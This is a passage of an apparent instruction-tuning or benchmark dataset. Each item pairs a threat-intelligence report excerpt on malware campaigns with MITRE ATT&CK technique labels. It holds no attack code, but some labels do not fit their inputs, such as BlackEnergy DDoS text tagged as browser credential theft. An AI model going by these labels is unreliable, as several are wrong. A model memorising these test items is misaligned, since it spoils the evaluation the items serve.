C2. It has the capability to find files, enumerate drives, exfiltrate data, take screenshots and provide a reverse shell. SNUGRIDE is a backdoor that communicates with its C2 server through HTTP requests", + "output": "- T1071.001: Application Layer Protocol - Web Protocols" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"Cisco Talos has discovered a new malware campaign based on a previously unknown family we're calling \"\"PoetRAT. The droppers are Microsoft Word documents that deploy a Python-based remote access trojan (RAT). We named this malware PoetRAT due to the various references to William Shakespeare, an English poet and playwright. The RAT has all the standard features of this kind of malware, providing full control of the compromised system to the operation. For exfiltration, it uses FTP, which denotes an intention to transfer large amounts of data. The campaign shows us that the operators manually pushed additional tools when they needed them on the compromised systems. We will describe a couple of these tools. The most interesting is a tool used to monitor the hard disk and exfiltrate data automatically\"", + "output": "- T1056.001: Input Capture - Keylogging" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The actor has distributed its dropper embedded in an archive file (\uc678\uad50\ubd80 \uac00\ud310 2021-05-07.zip) as an attachment through spearphishing emails. The archive file contains a JavaScript file (\uc678\uad50\ubd80 \uac00\ud310 2021-05-07.pdf.jse) which pretends to be a PDF file that contains two Base64 encoded blobs. The first one is the content of the decoy PDF file in Base64 format and the other one contains the AppleSeed payload also in Base64 format (encoded twice", + "output": "- T1204.002: User Execution - Malicious File\n- T1027: Obfuscated Files or Information" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The Daum variants of Brave Prince gather information from the system and save it to the file PI_00.dat. The type of data this implant gathers from the victim\u2019s system", + "output": "- T1016: System Network Configuration Discovery\n- T1012: Query Registry" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Collected files under the preliminary collection directory will be compressed using a WinRAR instance that the Ramsay Installer drops. This compressed archive will be saved within the preliminary collection directory and then generate a Ramsay container artifact", + "output": "- T1560.001: Archive Collected Data - Archive via Utility\n- T1083: File and Directory Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "As discussed in the delivery document\u00a0analysis above,\u00a0depending on the OS architecture either of the embedded\u00a0KerrDown\u00a0DLLs\u00a0will be dropped in the victim machine. The\u00a0DLL\u00a0is dropped in the directory location \u2018Users\\Administrator\\AppData\\Roaming\\\u2019\u00a0as \u2018main_background.png\u2019.\u00a0The DLL retrieves the payload from\u00a0the\u00a0URL, decrypts it by using DES algorithm and\u00a0execute it\u00a0in\u00a0the\u00a0memory. Therefore, it is observed that only the\u00a0KerrDown\u00a0DLL\u00a0downloader is saved in the system and the payload directly gets executed in the memory without being written in the system. Table\u00a01\u00a0shows the\u00a0URL\u00a0the downloader will attempt to download the payload from depending on the\u00a0OS architecture of the victim machine", + "output": "- T1105: Ingress Tool Transfer" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "HELLOKITTY is written in C++, but reimplements a significant portion of DEATHRANSOM's functionality using similar loop operations and thread pooling via QueueUserWorkItem. The code structure to enumerate network resources, logical drives, and perform file encryption is very similar. Additionally, HELLOKITTY and DEATHRANSOM share very similar functions to check for the completion status of their encryption threads before exiting", + "output": "- T1082: System Information Discovery\n- T1135: Network Share Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "AIRBREAK: a JavaScript-based backdoor also reported as \u201cOrz\u201d that retrieves commands from hidden strings in compromised webpages and actor controlled profiles on legitimate services. BADFLICK: a backdoor that is capable of modifying the file system, generating a reverse shell, and modifying its command and control (C2) configuration. HOMEFRY: a 64-bit Windows password dumper/cracker that has previously been used in conjunction with AIRBREAK and BADFLICK backdoors. The malware accepts up to two arguments at the command line: one to display cleartext credentials for each login session, and a second to display cleartext credentials, NTLM hashes, and malware version for each login session. MURKYTOP: a command-line reconnaissance tool", + "output": "- T1087.001: Account Discovery - Local Account\n- T1018: Remote System Discovery\n- T1135: Network Share Discovery\n- T1046: Network Service Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "At the time of writing, two VBS files have been seen pushed to the target computer by VBShower", + "output": "- T1105: Ingress Tool Transfer" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Another difference in the network traffic generated from the malware is that the encoded proxy information has been added in the URL query values during the C2 communication. Table 4 shows the parameters sent to C2 server from the backdoor in the newer versions", + "output": "- T1090.002: Proxy - External Proxy" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "This turned out to be the best solution, as the Cobalt group set up a controlled botnet in the bank's network which was very difficult to track and even harder to stop. In october 2016 Group-IB published the report about the Cobalt group. Network penetration In all cases investigated by Group-IB, the Cobalt group used a set of spear phishing emails to gain initial access to the corporate infrastructure. For organizations that perform timely updates of their systems and adhere to strict security policies, the Cobalt group employs another method to deliver malicious code through emails with Word documents containing a malicious macro. Provision of the malware survivability The Cobalt group uses different methods to ensure malware survivability on corporate networks. Aside from that, startup is performed by loading Cobalt Strike into the main memory without saving to the file system. Bypassing network security Cobalt Strike allows users to install two types of modules: HTTP/HTTPS/DNS modules and SMB modules. Use of standard tools Cobalt Strike is publicly accessible, and can be downloaded in order to learn and create detection rules on the network. To prevent this threat, the company should configure filter rules to detect the above-mentioned tools on the corporate network. Conclusion After infecting one computer on an organization's network, the Cobalt group analyzes the programs used on it and search for critical servers and the computers from which they are accessed", + "output": "- T1046: Network Service Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Initially, cybercriminals used BlackEnergy custom plugins for launching DDoS attacks. While another crimeware group continues to use BlackEnergy to launch DDoS attacks, the BE2 APT appears to have used this tool exclusively throughout 2014 at victim sites and included custom plugins and scripts of their own. To be clear, our name for this actor has been the BE2 APT, while it has been called \u201cSandworm Team\u201d also", + "output": "- T1555.003: Credentials from Password Stores - Credentials from Web Browsers" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "All of the bait documents are MHTML ones with malicious macro embedded and the .doc suffix to bypass detection. Below is an example of bait document captured by 360 Threat Intelligence Center in February 2019", + "output": "- T1059.005: Command and Scripting Interpreter - Visual Basic" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "2) The additional commands and execution objects are executed in the machine that has been compromised in the isolated network", + "output": "- T1204.002: User Execution - Malicious File" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Beacon: a backdoor that is commercially available as part of the Cobalt Strike software platform, commonly used for pen-testing network environments. The malware supports several capabilities, such as injecting and executing arbitrary code, uploading and downloading files, and executing shell commands. BLACKCOFFEE: a backdoor that obfuscates its communications as normal traffic to legitimate websites such as Github and Microsoft's Technet portal. Used by APT17 and other Chinese cyber espionage operators", + "output": "- T1102.001: Web Service - Dead Drop Resolver" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The initial infection vector of this campaign is a Microsoft Office Excel Worksheet with an Office macro that uses the mshta.exe Windows executable to run scripts, which are embedded in the HTML of a specially-crafted blogspot.com page. The page, 29[.]html, contains two distinct sections of scripts. The scripts create scheduled tasks and also retrieve, decode, and execute a copy of Revenge RAT", + "output": "- T1218.005: System Binary Proxy Execution - Mshta" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "BRONZE UNION has also leveraged various web shells to collect and stage data for exfiltration. In one instance, the threat actor gained remote access to a high-value system in a compromised network, ran quser.exe to identify existing RDP sessions on the device, immediately ran a command to compile a RAR archive that specified file types the threat actor did not want, and used a password to encrypt the archive", + "output": "- T1049: System Network Connections Discovery\n- T1560.002: Archive Collected Data - Archive via Library\n- T1074.001: Data Staged - Local Data Staging" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The loaded DLL retrieves the path to the Warzone malicious file from HKCU\\SOFTWARE\\_rptls\\Install, iterates through running processes and kills the Warzone process if it already exists. Then it runs the Warzone executable again, this time with Admin privileges", + "output": "- T1055: Process Injection" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "KillDisk has a numeric parameter that denotes the number of minutes (15 being the default) it will wait before it shuts down the affected machine. To try to reboot the machine, it will try to terminate these processes", + "output": "- T1489: Service Stop" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The backdoor determines its C2 server using a Domain Generation Algorithm (DGA) to construct and resolve a subdomain of avsvmcloud[.]com. The Update method is responsible for initializing cryptographic helpers for the generation of these random C2 subdomains. Subdomains are generated by concatenating a victim userId with a reversible encoding of the victims local machine domain name. The attacker likely utilizes the DGA subdomain to vary the DNS response to victims as a means to control the targeting of the malware. These subdomains are concatenated with one of the following to create the hostname to resolve", + "output": "- T1568: Dynamic Resolution" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Appendix A \u2013 PLAINTEE older variant Older variants of PLAINTEE can be identified via the unique mutex created during runtime. At least three variants of PLAINTEE have been identified to date, however, the following two samples have additional unique differences", + "output": "- T1548.002: Abuse Elevation Control Mechanism - Bypass User Account Control" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The threat actors used Windows\u2019 scheduled task and batch scripts to execute \u201cscr.exe\u201d and collect additional information from hosts on the network. The tool \u201cscr.exe\u201d is a screenshot utility that the threat actor used to capture the screen of systems across the network. The MD5 hash of \u201cscr.exe\u201d matched the MD5 of ScreenUtil, as reported in the Symantec Dragonfly 2.0 report", + "output": "- T1113: Screen Capture\n- T1059.003: Command and Scripting Interpreter - Windows Command Shell" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "HyperStack uses named pipes to execute remote procedure calls (RPC) from the controller to the device hosting the HyperStack client. To move laterally, the implant tries to connect to another remote device\u2019s IPC$ share, either using a null session or default credentials. IPC$ is a share that facilitates inter-process communication (IPC) by exposing named pipes to write to or read from. If the implant\u2019s connection to the IPC$ is successful, the implant can forward RPC commands from the controller to the remote device, and likely has the capability to copy itself onto the remote device", + "output": "- T1559: Inter-Process Communication\n- T1078.001: Valid Accounts - Default Accounts" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Hooking module \u2013 hooks a hardcoded set of WinAPI and (if they exist) Mozilla DLL Hooking is used to perform web injects, sniff traffic and keyboard data and even prevent DNS resolution of certain domains. Hooking works in the following way: QakBot injects a hooking module into the appropriate process, the module finds functions from the hardcoded set and modifies the functions so they jump to custom code", + "output": "- T1055: Process Injection" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The APT group has used web hosting credentials\u2014stolen from victims outside of their usual targets\u2014to host their malicious scripts and tools. Kimsuky likely obtained the credentials from the victims via spearphishing and credential harvesting scripts. On the victim domains, they have created subdomains mimicking legitimate sites and services they are spoofing, such as Google or Yahoo mail. 14] - Kimsuky has also sent benign emails to targets, which were possibly intended to build trust in advance of a follow-on email with a malicious attachment or link. Posing as South Korean reporters, Kimsuky exchanged several benign interview-themed emails with their intended target to ostensibly arrange an interview date and possibly build rapport. The APT group invited the targets to a Skype interview on the topic of inter-Korean issues and denuclearization negotiations on the Korean Peninsula. Posing as South Korean reporters, Kimsuky exchanged several benign interview-themed emails with their intended target to ostensibly arrange an interview date and possibly build rapport. After a recipient agreed to an interview, Kimsuky sent a subsequent email with a malicious document, either as an attachment or as a Google Drive link within the body. The document usually contained a variant of BabyShark malware (see the Execution section for information on BabyShark). When the date of the interview drew near, Kimsuky sent an email canceling the interview. Kimsuky tailors its spearphishing and social engineering approaches to use topics relevant to the target, such as COVID-19, the North Korean nuclear program, or media interviews", + "output": "- T1583.001: Acquire Infrastructure - Domains" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The latter does not use libcurl anymore and now uses winhttp to perform all requests to C2. The usage of the HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run registry key has a persistence mechanism that has been replaced by the creation of a service. The C2 path pattern has also changed, we have identified the following paths: ini.php, info.php and parse_ini_file.php, which are no longer random nor animal named based", + "output": "- T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Throughout the spear-phishing campaign, the threat actors used email attachments to leverage legitimate Microsoft Office functions for retrieving a document from a remote server using the Server Message Block (SMB) protocol. Note: transfer of credentials can occur even if the file is not retrieved. After obtaining a credential hash, the threat actors can use password-cracking techniques to obtain the plaintext password. With valid credentials, the threat actors are able to masquerade as authorized users in environments that use single-factor authentication", + "output": "- T1078: Valid Accounts" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The emails first originated from a spoofed sender that impersonated a Meetings Services Assistant at the United Nations General Assembly Secretariat. The threat actor achieved this impersonation by utilizing the legitimate email marketing service SMTP2Go, which allows users to alter the envelope sender field while using a unique sender address generated by the service", + "output": "- T1585.002: Establish Accounts - Email Accounts" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The new spear-phishing docs used by MuddyWater rely on social engineering to persuade users to enable macros. The attackers rely on a range of compromised hosts to deliver their attacks", + "output": "- T1566.001: Phishing - Spearphishing Attachment" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "FANCY BEAR adversary used different tradecraft, deploying X-Agent malware with capabilities to do remote command execution, file transmission and keylogging", + "output": "- T1105: Ingress Tool Transfer" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Once explorer.exe is running, the service configures the environment and executes the C2 contact module: winprint32.exe. This module is responsible for launching the document search module, contact the C2 and exfiltrate the collected documents", + "output": "- T1020: Automated Exfiltration\n- T1041: Exfiltration Over C2 Channel" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "To initially gain access to the environment, Managed Defense analysts identified that FIN6 compromised an internet facing system. Following the compromise of this system, analysts identified FIN6 leveraged stolen credentials to move laterally within the environment using the Windows\u2019 Remote Desktop Protocol (RDP", + "output": "- T1003.001: OS Credential Dumping - LSASS Memory\n- T1021.001: Remote Services - Remote Desktop Protocol\n- T1078: Valid Accounts" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"Use of Open Source Tools In an attempt to avoid detection and as an anti-analysis tactic, the OilRig group abused an open source tool called Invoke-Obfuscation to obfuscate the code used for QUADAGENT. Invoke-Obfuscation is freely available via a Github repository and allows a user to change the visual representation of a PowerShell script simply by selecting the desired obfuscation techniques. Invoke-Obfuscation offers a variety of obfuscation techniques, and by analyzing the script we were able to ascertain the specific options in this attack. After identifying the specific options used to obfuscate QUADAGENT, we were able to deobfuscate the PowerShell script and perform additional analysis. We found two obfuscation techniques applied to the script: the first one changing the representation of variables; the second one changing the representation of strings in the script. Invoke-Obfuscation calls the string obfuscation used by the actors to further obfuscate this script Reorder, which uses the string formatting functionality within PowerShell to reconstruct strings from out of order substrings (ex. 1}{0}\"\" -f 'bar','foo'). During our analysis, we installed Invoke-Obfuscation and used it to obfuscate a previously collected QUADAGENT sample to confirm our analysis. We captured the commands we ran in Invoke-Obfuscation in the animation in Figure 3 below, which visualizes the steps the threat actor may have taken to create the payload delivered in this attack\"", + "output": "- T1059.003: Command and Scripting Interpreter - Windows Command Shell" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "T1566.001: Spearphishing Attachment - T1566.002: Spearphishing Link - T1566.003: Spearphishing via Service - - - T1204.001: Malicious Link - T1204.002: Malicious File - T1059: Command and Scripting Interpreter T1059.005: Visual Basic - T1059.005: Visual Basic - - T1053.005: Scheduled Task - T1129: Shared Modules - T1106: Native API - T1047: Windows Management Instrumentation - - T1027: Obfuscated Files or Information T1027.002: Software Packing - T1027.002: Software Packing - T1553: Subvert Trust Controls T1553.002: Code Signing - T1553.002: Code Signing - T1218: Signed Binary Proxy Execution T1218.010: Regsvr32 - T1218.010: Regsvr32 - - T1497.001: System Checks - T1497.002: User Activity Based Checks - T1497.003: Time Based Evasion - T1112: Modify Registry - T1070: Indicator Removal on Host T1070.004: File Deletion - T1070.004: File Deletion - T1140: De-obfuscate/Decode Files or Information - - - T1090.003: Multi-hop Proxy - T1105: Ingress Tool Transfer - - T1055: Process Injection T1055.012: Process Hollowing - T1055.012: Process Hollowing - - T1082: System Information Discovery - T1049: System Network Connections Discovery - T1016: System Network Configuration Discovery - T1057: Process Discovery - T1033: System Owner/User Discovery - T1518: Software Discovery T1518.001: Security Software Discovery - T1518.001: Security Software Discovery - Persistence T1546: Event Triggered Execution T1547: Boot or Logon Autostart Execution T1547.001: Registry Run Keys / Startup Folder - T1546: Event Triggered Execution - T1547: Boot or Logon Autostart Execution T1547.001: Registry Run Keys / Startup Folder - T1547.001: Registry Run Keys / Startup Folder", + "output": "- T1070.004: Indicator Removal - File Deletion" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "After the execution of rundll32.exe, the PowerShell script enu.ps1 is executed. This script is encoded with Base64 in order to avoid detection by antivirus products", + "output": "- T1027: Obfuscated Files or Information" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK 